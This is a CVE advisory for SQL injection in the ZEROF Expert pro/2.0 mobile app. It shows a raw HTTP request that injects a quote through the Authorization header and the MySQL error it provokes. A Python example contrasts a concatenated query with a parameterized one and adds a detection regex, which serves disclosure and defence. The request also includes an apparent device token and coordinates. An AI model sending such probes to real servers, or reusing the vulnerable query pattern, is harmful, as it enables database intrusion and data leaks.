
CVE-2021-30176

Description

The ZEROF Expert pro/2.0 application for mobile devices allows SQL Injection.

Additional Information

Parameters received by the web application must be sanitized and validated so that user-supplied values cannot be interpreted as SQL control constructs.

Vulnerability Type

SQL Injection

Vendor of Product

Zerof

Affected Product Code Base

ZEROF Expert pro/2.0 (mobile app)

Affected Component

/v2/devices/add endpoint, Authorization header

Attack Type

Remote

Impact Code Execution

true

Impact Information Disclosure

true

Discoverer

  • Anna Sidorova
  • AWILLIX LLC

Attack Vectors

Example:

POST /v2/devices/add HTTP/1.1
Host: zerof
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Date: Thu, 07 Apr 2021 13:40:57 +0300
Content-Length: 241
User-Agent: ZEROF Expert pro/2.0 (com.zerof.expertpro; build:2; iOS 14.4.0) Alamofire/4.8.2
Accept-Language: ru-RU;q=1.0
Authorization: ZWS admin':e4NQCMRQELfsoddJwJPz/YoB3ak=
Accept-Encoding: gzip, deflate

device=?unrecognized?&geo=55.70402368871489%2C37.615802664058954&os=iOS%2014.4&token=f9Q0hE5JRpE%3AAPA91bFP19KGIIwJyLrbTuLwtP_jUvkUqqFM_k4W8czxm3ajT5Rh0jD2OHO_NmRIeY1C9zjzzNS_ch8VlNy2Bnqj5FcIdrWIFEevprpMGf3k96uFHuUsaa3aF8FS-RGwIsY8AXcUYcOP

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Type: application/json; charset=utf-8
Content-Length: 176
Date: Wed, 07 Apr 2021 10:35:59 GMT
Server: ZEROF Web Server

<html> #42000You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'')' at line 1 </html>
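The lookup behaviour implied by the exchange above, as an added example that is not part of the advisory or of ZEROF's code: a constructed in-memory SQLite user table, a parser for the `ZWS user:signature` header shape seen in the request, the concatenating lookup that turns the stray quote into a syntax error beside the parameterized lookup that treats it as data, and a small detection helper that flags Authorization headers carrying SQL metacharacters. The `users` schema, the secret value and every function name are assumptions; the real backend runs MySQL and its schema is unknown.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the user store (assumption: the real schema is unknown)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, secret TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db


def parse_zws(header):
    """Split 'ZWS <user>:<signature>', the header shape shown in the advisory's request."""
    scheme, _, rest = header.partition(" ")
    user, sep, signature = rest.partition(":")
    if scheme != "ZWS" or not sep or not user:
        raise ValueError("malformed ZWS Authorization header")
    return user, signature


def lookup_unsafe(db, user):
    """Vulnerable pattern: the user name is spliced into the SQL text."""
    return db.execute("SELECT secret FROM users WHERE name = '" + user + "'").fetchone()


def lookup_safe(db, user):
    """Hardened pattern: a bound parameter, so a quote is data, never SQL syntax."""
    return db.execute("SELECT secret FROM users WHERE name = ?", (user,)).fetchone()


def authenticate(db, header, safe):
    """Return 'ok', 'unknown-user' or 'sql-error' for one Authorization header.

    The signature half of the header is not verified here; the example only
    models how the user name reaches the database.
    """
    user, _signature = parse_zws(header)
    try:
        row = (lookup_safe if safe else lookup_unsafe)(db, user)
    except sqlite3.OperationalError:
        # The SQLite counterpart of the MySQL "error in your SQL syntax" 500 above.
        return "sql-error"
    return "ok" if row else "unknown-user"


# Characters that have no business in a user name but do change SQL parsing.
SQL_METACHARS = re.compile(r"""['"`;]|--|/\*""")


def suspicious_auth_header(header):
    """Detection aid: True when the ZWS user field carries SQL metacharacters
    or the header does not parse at all."""
    try:
        user, _ = parse_zws(header)
    except ValueError:
        return True
    return bool(SQL_METACHARS.search(user))


if __name__ == "__main__":
    db = make_db()
    # Constructed header modelled on the advisory's "ZWS admin':..." value.
    for hdr in ("ZWS admin:c29tZXNpZw==", "ZWS admin':c29tZXNpZw=="):
        print(hdr, "unsafe ->", authenticate(db, hdr, safe=False),
              "| safe ->", authenticate(db, hdr, safe=True),
              "| flagged:", suspicious_auth_header(hdr))
```

With the concatenating lookup the quoted name produces a database syntax error that the server surfaces as a 500, which is both the injection signal and an information leak; with the bound parameter the same header simply fails to match a user. The detection helper is suited to request logs or a gateway rule, and a 500 response whose body quotes a database syntax error is the server-side counterpart worth alerting on.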

Reference